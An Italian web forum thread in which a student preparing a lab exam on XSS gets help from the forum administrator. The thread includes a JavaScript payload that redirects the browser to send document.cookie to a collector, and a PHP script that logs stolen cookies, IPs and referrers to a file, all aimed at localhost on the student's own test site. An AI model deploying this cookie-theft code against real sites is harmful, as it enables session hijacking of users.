Il Forum di Orebla.it

Benvenuto nella community di Orebla.it
Oggi è mar 16 lug, 2019 10:18 pm

Tutti gli orari sono UTC + 1 ora




Apri un nuovo argomento Rispondi all’argomento  [ 15 messaggi ] 
Autore Messaggio
 Oggetto del messaggio: Xss+cookie
Messaggio da leggereInviato: lun 02 ott, 2006 11:45 am 
Non connesso
Newbie
Newbie

Iscritto il: dom 01 ott, 2006 7:53 pm
Messaggi: 18
Sono uno studente di ing elettronica alle prese con un esame di laboratorio di informatica.
Per la prova di esame ho analizzato il problema dell'XSS e di quanto sia realmente pericoloso, soprattutto quando si riesce a "prendere" un cookie.
Ora, il mio docente vorrebbe una qualche prova "reale" per vedere se so mettere in pratica quanto scritto (in realt? quanto copiato :D)


Ora ho creato un piccolo sito web http://xssprova.altervista.org/Administrator.htm dove, digitando la password (nicoletta) dovrei accedere al sistema.
In realt? creo un cookie.

Ora i problemi sono due:
1)come faccio a memorizzare i dati di password e tutto il resto dentro il cookie?
2)come diavolo faccio a prelevarlo?

In locale ho provato a inserire
http://127.0.0.1/xss.php?[script] document.location.href="http://127.0.0.1/sitomaligno.php?data="+document.cookie; /script

e mi esce solamente: Cookie=127.0.0.1




Molte grazie
Andrea


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: lun 02 ott, 2006 7:37 pm 
Non connesso
Newbie
Newbie

Iscritto il: dom 01 ott, 2006 7:53 pm
Messaggi: 18
allora, sto andando un po' avanti...

tanto tempo fa un mio amico (di cui non ho pi? traccie da un bel po' di tempo) mi lascio' un suo progetto di un sistema informativo che ha le sessioni.
Ora, visto che sembra tutto funzionare, vorrei sostituire la parte relativa alla creazione delle sessioni con quella del cookie.
Cos? facendo tenter? di prendere il cookie con lo script di prima di xss.

il sito di prova ?
http://xssprova.altervista.org/old

e user e pass sono prova

Vi allego i tre file
-index.php
-login.php
-logout.php

Ancora grazie
Andrea


Allegati:
php.rar [1.71 KiB]
Scaricato 301 volte
Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mar 03 ott, 2006 8:06 am 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Vedi l'XSS non funziona se non c'? un campo di input che venga visualizzato nel codice HTML.

Dovresti inserire un campo, tipo per la ricerca, che invia le informazioni tramite GET e che non effettua il controllo dell'input.
Dopo tramite quel campo gli inietti il comando
Codice:
<scri pt>al ert(document.co okie)</scri pt>

per vedere se ti compare la tua sessione!
Occhio per? che il PHP ha sempre attivo (nella maggior parte dei casi) le magic_quotes.

Le magic_quotes altro non ? che un sistema di protezione, infatti aggiunge uno slash("\") prima di ogni carattere speciale per evitare SQL Injection e roba varia.

Quindi devi prepararti anche un codice javascript di "iniezione" apposito per la magic_quotes = ON!

I file che hai allegato non potranno mai avere un XSS, per il motivo detto prima. L'unica cosa che ho visto ? che possono essere attaccati tramite SQL Injection!

PS: il motivo per cui prima non ti dava il permesso di postare i mess ? che il mio server ha bloccato l'invio di alcuni caratteri, come vedi nel codice javascript in alto ho dovuto separare le parole, ma vanno attaccate per funzionare! ? solamente un metodo di sicurezza in pi?!

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mar 03 ott, 2006 7:56 pm 
Non connesso
Newbie
Newbie

Iscritto il: dom 01 ott, 2006 7:53 pm
Messaggi: 18
Innanzi tutto grazie per l'aiuto che mi stai fornendo.
Allora, diciamo che ho completato il tutto per l'esame, o almeno spero :)

Se vai su http://xssprova.altervista.org puoi vedere cosa ho fatto

Allora, se inserisci come nome utene e password la parola "pass" avrai accesso.
Cos? facendo creo un cookie, in cui sono memorrizati i valori di "user" e "pass"

Poi, torna alla home page senza fare il logoout
e inserisco il codice che mi hai scritto tu prima

<s-cript>alert(document.cookie)</s-cript>
ed ottengo un alert con il contenuto del cookie.
Fin qu? tutto ok

Se rifai la prova con
http://xssprova.altervista.org/sitosicuro
non dovresti avere pi? l'alert ma dovresti leggere lo script stesso.

Ora, ho cercato tra questo splendido forum gli altri tipi di bug che hanno altri siti web, molto noti
dopo la scritta index.php ho provato a inserire questo script
"><s-cript>alert(document.cookie)<\s-cript>/s-cript>/?]
e in entrambi i casi, cio? sia con che senza validazione mi rid? il mio cookie.
Come faccio a evitare questo problema con lo script di poc'anzi?


Un'altra domanda.
E' possibile "leggere" il cookie non attraverso l'alert, ma come un normale file di testo?

Grazie
Andrea


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mer 04 ott, 2006 7:56 am 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Si devo dire che cos? ? tutto perfetto!!
Il problema del codice javascript dopo la index.php ? un problema di PHP. Se utilizzata una apposita funzione ti restituisce il codice javascript.

Ho provato ad inserirlo nel tuo script ma non mi d? nessun problema!

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mer 04 ott, 2006 8:04 am 
Non connesso
Newbie
Newbie

Iscritto il: dom 01 ott, 2006 7:53 pm
Messaggi: 18
orebla ha scritto:
Si devo dire che cos? ? tutto perfetto!!
Il problema del codice javascript dopo la index.php ? un problema di PHP. Se utilizzata una apposita funzione ti restituisce il codice javascript.

Ho provato ad inserirlo nel tuo script ma non mi d? nessun problema!


Sei sicuro????

Guarda qu?

Eventualmente, come si risolve?



Andrea
Grazie ancora


Allegati:
Immagine.JPG
Immagine.JPG [ 42.58 KiB | Osservato 1741 volte ]
Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mer 04 ott, 2006 11:15 am 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Come ti avevo detto non ? un problema del tuo script. MA della pagina di errore 404 di altervista.
Quindi per risolvere devi andare nel pannello di controllo di altervista e modificare la pagina 404!
eventualmente potresti inserire nella root del sito una pagina che si chiama 404.shtml!
Ovviamente la devi creare tu!
Perci? ti consiglio il primo punto!

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: mer 04 ott, 2006 3:33 pm 
Non connesso
Newbie
Newbie

Iscritto il: dom 01 ott, 2006 7:53 pm
Messaggi: 18
Ok grazie.

Spiegami una cosa.
Quando io creo il cookie, e poi attraverso quei codici lo visualizzo eseguo tutto sul mio pc, giusto?

Con l'xss sarebbe possibile fare in modo che tu, ad esempio, ti logghi su questo forum (e supponiamo che esso crei solo un cookie) e io, dal mio pc, riesca a rubarti il tuo cookie?

Da quello che ho capito, con questa tecnica ? solo possibile prendere il cookie di un utente che si era precedemente loggato sempre con questo computer e non da un'altra postazione (tanto meno da un pc collegato con un'altro IP)
Diciamo che se non ho capito male, questa tecnica potrebbe servire ad un hacher solo se riesce ad usare il mio stesso pc, giusto?
Quindi in una rete locale.
Dammi qualche delucidazione...


Grazie mille


Andrea

p.s. sono riuscito a implementare il tutto usando il metodo POST e non GET.
Il comando che mi hai inviato funziona solo con POST e non con GET


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: gio 05 ott, 2006 2:19 pm 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Allora adesso ti spiego, l'XSS ? uno dei pi? comuni (forse il primo) bug della rete, cio? dei siti web.
Sono pochi i webmaster o gli scripter che validano tutti i dati in input che hanno i loro script o siti web. A conferma di questa mia affermazioni c'? il fatto che Google e Yahoo! pochi anni fa (non molti) non validavano il campo input della ricerca. Cos? potevi inserire tutto il codice HTML o Javascript che volevi.. Incredibile ma ? cos?!

Diciamo che l'XSS via POST ? inutile, o meglio ? molto poco pericoloso di quello via GET.
Il motivo ? semplice via POST devi usare uno script pre-confezionato per inviare l'input allo script e rubare l'eventuale cookie o creare attacchi di PHISHING.

Mentre tramite il GET ti basta dargli l'indirizzo URL ed il gioco ? fatto.

Quello di mostrare il solito
Codice:
>s-cript<alert(document.cookie)>/s-cript<

come codice iniettato ? solamente un esempio.
Con quello mica ci rubi il cookie... Lo visualizzi solo.
Per rubare il cookie ti serve un altro tipo di codice javascript, che se ne lavora silenziosamente sotto la pagina HTML.
Poi con uno script PHP ricevi il cookie appena inviato.

Ecco il codice javascript:
Codice:
>s-cript< window.location="http://localhost/cookie.php?data=" +window.parent.document.location+window.parent.document.cookie >/s-cript<



Come vedi il codice javascript sopra riportato invia alla pagina cookie.php che st? su Localhost due dati tramite la variabile GET "data". Le variabili sono: 1- la pagina in cui ? inserito il codice (? inutile ma quando utilizzi lo stesso script per ricevere i cookie ti serve!!) 2- il cookie (quello pi? importante.


Questo invece ? la pagina cookie.php:
Codice:
$cookie = $_GET['data'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookie.txt', 'a');
fwrite($fp, "Cookie: ".$cookie."\n IP: " .$ip. "\n Data: " .$date. "\n Referer: ".$referer."\n\n");
fclose($fp);


Come vedi riceve la variabile "data" poi la scrive su un file di testo che si chiama cookie.txt ed inserisce altri dati per fare pi? chiarezza!

Spero di averti chiarito il tutto!

Ps: per far funzionare gli script javascript devi modificare i TAG di inizio e fine! Li ho messi co? per evitare il blocco di sicurezza!

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: gio 05 ott, 2006 4:08 pm 
Non connesso
Newbie
Newbie

Iscritto il: dom 01 ott, 2006 7:53 pm
Messaggi: 18
Io dico che sei un grande!!!!!!!
Senza di te questo esempio pratico non lo avrei fatto!!!

Stamane ho consegnato tesina, esempi e tutto il resto :)

Ora il 18 p.v., ci sar? l'esame.
Penso che gli esempi che gli abbiamo fornito siano suff.
Gli ho anche fatto un esempio di CSRF visto che la mia tesina verteva sugli XSS e CSRF.


GRAZIE DAVVERO!!! :D


Andrea


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: gio 05 ott, 2006 4:33 pm 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Figurati. Gli XSS non sono poi cos? difficili!
Poi sappimi dire come va! :wink:

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: gio 05 ott, 2006 4:35 pm 
Non connesso
Newbie
Newbie

Iscritto il: dom 01 ott, 2006 7:53 pm
Messaggi: 18
Ci mancherebbe!!!


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: sab 25 nov, 2006 10:53 am 
Non connesso
Newbie
Newbie

Iscritto il: dom 01 ott, 2006 7:53 pm
Messaggi: 18
orebla ha scritto:
Figurati. Gli XSS non sono poi cos? difficili!
Poi sappimi dire come va! :wink:

Grazieeee davvero...

Finalmente ho verbalizzato l'esame (la verbalizzazione ? valida solo in alcuni periodi dell'anno accademico)
Ho preso il massimo del massimo: 30L

Moooooolte grazie!!!!

Andrea


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: sab 25 nov, 2006 7:52 pm 
Non connesso
Amministratore
Amministratore
Avatar utente

Iscritto il: lun 27 dic, 2004 10:32 am
Messaggi: 2614
Località: Ferrara
Grandissimo!
Ora possiamo anche classificarci come aiuto universitario!

_________________
I'm so happy because today
I've found my friends ...
They're in my head

[NIRVANA - LITHIUM]
Il Blog del disperato: http://blog.orebla.it


Top
 Profilo  
 
 Oggetto del messaggio:
Messaggio da leggereInviato: dom 26 nov, 2006 9:06 am 
Non connesso
Newbie
Newbie

Iscritto il: dom 01 ott, 2006 7:53 pm
Messaggi: 18
orebla ha scritto:
Grandissimo!
Ora possiamo anche classificarci come aiuto universitario!


S? s? :D :D


Top
 Profilo  
 
Visualizza ultimi messaggi:  Ordina per  
Apri un nuovo argomento Rispondi all’argomento  [ 15 messaggi ] 

Tutti gli orari sono UTC + 1 ora


Chi c’è in linea

Visitano il forum: Nessuno e 1 ospite


Non puoi aprire nuovi argomenti
Non puoi rispondere negli argomenti
Non puoi modificare i tuoi messaggi
Non puoi cancellare i tuoi messaggi
Non puoi inviare allegati

Cerca per:
Vai a:  
Powered by phpBB® Forum Software © phpBB Group
Traduzione Italiana phpBBItalia.net basata su phpBB.it 2010
phpBB SEO